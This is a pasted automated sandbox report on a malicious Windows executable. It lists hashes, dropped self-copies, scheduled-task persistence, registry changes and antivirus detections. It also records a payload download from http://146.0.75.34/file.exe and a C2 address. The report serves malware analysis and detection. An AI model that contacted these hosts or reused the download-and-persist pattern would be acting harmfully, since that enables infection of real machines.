paladin316

Exes_3c109c73be3edd7c38985a64abc7812a_exe_2019-07-25_08_30.txt

Jul 25th, 2019
2,108
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.94 KB | None | 0 0
  1.  
  2. * MalFamily: "Malicious"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_3c109c73be3edd7c38985a64abc7812a.exe"
  7. * File Size: 210944
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "1a1e6600071bdf843db020f63aab2be6edf186b572341823130039e4282f8414"
  10. * MD5: "3c109c73be3edd7c38985a64abc7812a"
  11. * SHA1: "a108ce82c3320ee720203f497579407d35f2d127"
  12. * SHA512: "b28ce02c6423873c795ba326533cc8186cf40e8ba5f8da2a6b764259841ffbd7cecd53f6a8b3e9683f22a78c460b003232676488b78a6667465e62979e10c3d0"
  13. * CRC32: "3FBC9979"
  14. * SSDEEP: "3072:h2UjUAVF2/YUKDwE1Bj92nGu+4VUfM640bfBNn7g9rjJAn:h2GFkY6nXVUfLdy9rjJi"
  15.  
  16. * Process Execution:
  17. "Exes_3c109c73be3edd7c38985a64abc7812a.exe",
  18. "svchost.exe",
  19. "taskeng.exe",
  20. "ksmd.exe",
  21. "taskeng.exe",
  22. "ksmd.exe",
  23. "qmupc.exe",
  24. "orfq.exe",
  25. "taskeng.exe",
  26. "orfq.exe"
  27.  
  28.  
  29. * Executed Commands:
  30. "taskeng.exe D83442B3-2511-4F84-85FB-6DCB9239EB94 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  31. "taskeng.exe 31943EC2-DADF-49C0-A3E5-7C86D61F225D S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  32. "taskeng.exe CC2FFFAA-C423-4E81-9EB6-115D64F34A8E S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
  33. "C:\\ProgramData\\rpkiece\\ksmd.exe start2",
  34. "C:\\Users\\user\\AppData\\Local\\Temp\\qmupc.exe",
  35. "C:\\ProgramData\\mkxwvuk\\orfq.exe start2"
  36.  
  37.  
  38. * Signatures Detected:
  39.  
  40. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  41. "Details":
  42.  
  43. "IP": "146.0.75.34:4083"
  44.  
  45.  
  46.  
  47.  
  48. "Description": "Creates RWX memory",
  49. "Details":
  50.  
  51.  
  52. "Description": "A process attempted to delay the analysis task.",
  53. "Details":
  54.  
  55. "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
  56.  
  57.  
  58. "Process": "taskeng.exe tried to sleep 480 seconds, actually delayed analysis time by 0 seconds"
  59.  
  60.  
  61.  
  62.  
  63. "Description": "Drops a binary and executes it",
  64. "Details":
  65.  
  66. "binary": "C:\\ProgramData\\rpkiece\\ksmd.exe"
  67.  
  68.  
  69. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\qmupc.exe"
  70.  
  71.  
  72. "binary": "C:\\ProgramData\\mkxwvuk\\orfq.exe"
  73.  
  74.  
  75.  
  76.  
  77. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  78. "Details":
  79.  
  80. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  81.  
  82.  
  83. "suspicious_request": "http://146.0.75.34/file.exe"
  84.  
  85.  
  86.  
  87.  
  88. "Description": "Performs some HTTP requests",
  89. "Details":
  90.  
  91. "url": "http://146.0.75.34/file.exe"
  92.  
  93.  
  94.  
  95.  
  96. "Description": "The binary likely contains encrypted or compressed data.",
  97. "Details":
  98.  
  99. "section": "name: .text, entropy: 7.03, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x0001d800, virtual_size: 0x0001d6ce"
  100.  
  101.  
  102.  
  103.  
  104. "Description": "Installs itself for autorun at Windows startup",
  105. "Details":
  106.  
  107. "file": "C:\\Windows\\Tasks\\bmfgrcnobcnsggssflw.job"
  108.  
  109.  
  110. "file": "C:\\Windows\\Tasks\\ksmd.job"
  111.  
  112.  
  113. "file": "C:\\Windows\\Tasks\\orfq.job"
  114.  
  115.  
  116. "file": "C:\\Windows\\Tasks\\orfq.job"
  117.  
  118.  
  119. "file": "C:\\Windows\\Tasks\\bmfgrcnobcnsggssflw.job"
  120.  
  121.  
  122. "file": "C:\\Windows\\Tasks\\ksmd.job"
  123.  
  124.  
  125.  
  126.  
  127. "Description": "Creates a hidden or system file",
  128. "Details":
  129.  
  130. "file": "C:\\Windows\\Tasks\\ksmd.job"
  131.  
  132.  
  133. "file": "C:\\Windows\\Tasks\\bmfgrcnobcnsggssflw.job"
  134.  
  135.  
  136. "file": "C:\\Windows\\Tasks\\orfq.job"
  137.  
  138.  
  139.  
  140.  
  141. "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
  142. "Details":
  143.  
  144. "FireEye": "Generic.mg.3c109c73be3edd7c"
  145.  
  146.  
  147. "Malwarebytes": "Trojan.MalPack.GS"
  148.  
  149.  
  150. "K7GW": "Trojan ( 005519d41 )"
  151.  
  152.  
  153. "K7AntiVirus": "Trojan ( 005532e31 )"
  154.  
  155.  
  156. "Symantec": "ML.Attribute.HighConfidence"
  157.  
  158.  
  159. "APEX": "Malicious"
  160.  
  161.  
  162. "ClamAV": "Win.Packed.addsub-6963063-0"
  163.  
  164.  
  165. "Rising": "Exploit.UAC!8.107CD (TFE:6:U3DKQk4Ha2C)"
  166.  
  167.  
  168. "SentinelOne": "DFI - Suspicious PE"
  169.  
  170.  
  171. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  172.  
  173.  
  174. "Endgame": "malicious (high confidence)"
  175.  
  176.  
  177. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  178.  
  179.  
  180. "Acronis": "suspicious"
  181.  
  182.  
  183. "Cylance": "Unsafe"
  184.  
  185.  
  186. "AVG": "FileRepMalware"
  187.  
  188.  
  189. "Cybereason": "malicious.2c3320"
  190.  
  191.  
  192. "CrowdStrike": "win/malicious_confidence_60% (D)"
  193.  
  194.  
  195. "Qihoo-360": "HEUR/QVM10.1.C13F.Malware.Gen"
  196.  
  197.  
  198.  
  199.  
  200. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  201. "Details":
  202.  
  203. "target": "clamav:Win.Packed.addsub-6963063-0, sha256:1a1e6600071bdf843db020f63aab2be6edf186b572341823130039e4282f8414, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  204.  
  205.  
  206. "dropped": "clamav:Win.Packed.addsub-6963063-0, sha256:1a1e6600071bdf843db020f63aab2be6edf186b572341823130039e4282f8414 , guest_paths:C:\\ProgramData\\rpkiece\\ksmd.exe*C:\\Users\\user\\AppData\\Local\\Temp\\qmupc.exe*C:\\ProgramData\\mkxwvuk\\orfq.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  207.  
  208.  
  209.  
  210.  
  211. "Description": "Creates a copy of itself",
  212. "Details":
  213.  
  214. "copy": "C:\\ProgramData\\rpkiece\\ksmd.exe"
  215.  
  216.  
  217. "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\qmupc.exe"
  218.  
  219.  
  220. "copy": "C:\\ProgramData\\mkxwvuk\\orfq.exe"
  221.  
  222.  
  223.  
  224.  
  225. "Description": "Created network traffic indicative of malicious activity",
  226. "Details":
  227.  
  228. "signature": "ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)"
  229.  
  230.  
  231.  
  232.  
  233.  
  234. * Started Service:
  235.  
  236. * Mutexes:
  237. "ksmd",
  238. "CicLoadWinStaWinSta0",
  239. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  240. "orfq"
  241.  
  242.  
  243. * Modified Files:
  244. "C:\\ProgramData\\rpkiece\\ksmd.exe",
  245. "C:\\Windows\\Tasks\\ksmd.job",
  246. "C:\\Windows\\sysnative\\Tasks\\ksmd",
  247. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  248. "C:\\Windows\\Tasks\\bmfgrcnobcnsggssflw.job",
  249. "C:\\Windows\\sysnative\\Tasks\\bmfgrcnobcnsggssflw",
  250. "C:\\Windows\\Tasks\\orfq.job",
  251. "C:\\Windows\\sysnative\\Tasks\\orfq",
  252. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  253. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  254. "C:\\Users\\user\\AppData\\Local\\Temp\\qmupc.exe",
  255. "C:\\ProgramData\\mkxwvuk\\orfq.exe"
  256.  
  257.  
  258. * Deleted Files:
  259. "C:\\Windows\\Tasks\\ksmd.job",
  260. "C:\\Windows\\sysnative\\Tasks\\ksmd",
  261. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  262. "C:\\Windows\\Tasks\\bmfgrcnobcnsggssflw.job",
  263. "C:\\Windows\\Tasks\\orfq.job"
  264.  
  265.  
  266. * Modified Registry Keys:
  267. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\AC2897E8-418F-4C77-9CA3-B2BDC3DECAB4\\Path",
  268. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\AC2897E8-418F-4C77-9CA3-B2BDC3DECAB4\\Hash",
  269. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ksmd\\Id",
  270. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\ksmd\\Index",
  271. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\AC2897E8-418F-4C77-9CA3-B2BDC3DECAB4\\Triggers",
  272. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\AC2897E8-418F-4C77-9CA3-B2BDC3DECAB4\\DynamicInfo",
  273. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ksmd.job",
  274. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ksmd.job.fp",
  275. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D83442B3-2511-4F84-85FB-6DCB9239EB94",
  276. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\31943EC2-DADF-49C0-A3E5-7C86D61F225D",
  277. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\54077F4C-EECC-4348-8DA6-7E495AAF317D\\Path",
  278. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\54077F4C-EECC-4348-8DA6-7E495AAF317D\\Hash",
  279. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\bmfgrcnobcnsggssflw\\Id",
  280. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\bmfgrcnobcnsggssflw\\Index",
  281. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\54077F4C-EECC-4348-8DA6-7E495AAF317D\\Triggers",
  282. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\54077F4C-EECC-4348-8DA6-7E495AAF317D\\DynamicInfo",
  283. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\bmfgrcnobcnsggssflw.job",
  284. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\bmfgrcnobcnsggssflw.job.fp",
  285. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\70FA42BC-F5FF-43D8-95DA-4D8F11C69760\\Path",
  286. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\70FA42BC-F5FF-43D8-95DA-4D8F11C69760\\Hash",
  287. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\orfq\\Id",
  288. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\orfq\\Index",
  289. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\70FA42BC-F5FF-43D8-95DA-4D8F11C69760\\Triggers",
  290. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\70FA42BC-F5FF-43D8-95DA-4D8F11C69760\\DynamicInfo",
  291. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\orfq.job",
  292. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\orfq.job.fp",
  293. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\CC2FFFAA-C423-4E81-9EB6-115D64F34A8E",
  294. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\D83442B3-2511-4F84-85FB-6DCB9239EB94\\data",
  295. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\31943EC2-DADF-49C0-A3E5-7C86D61F225D\\data",
  296. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\CC2FFFAA-C423-4E81-9EB6-115D64F34A8E\\data"
  297.  
  298.  
  299. * Deleted Registry Keys:
  300. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ksmd.job",
  301. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\ksmd.job.fp"
  302.  
  303.  
  304. * DNS Communications:
  305.  
  306. * Domains:
  307.  
  308. * Network Communication - ICMP:
  309.  
  310. * Network Communication - HTTP:
  311.  
  312. "count": 1,
  313. "body": "",
  314. "uri": "http://146.0.75.34/file.exe",
  315. "user-agent": "Microsoft Internet Explorer",
  316. "method": "GET",
  317. "host": "146.0.75.34",
  318. "version": "1.1",
  319. "path": "/file.exe",
  320. "data": "GET /file.exe HTTP/1.1\r\nUser-Agent: Microsoft Internet Explorer\r\nHost: 146.0.75.34\r\nCache-Control: no-cache\r\n\r\n",
  321. "port": 80
  322.  
  323.  
  324.  
  325. * Network Communication - SMTP:
  326.  
  327. * Network Communication - Hosts:
  328.  
  329. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment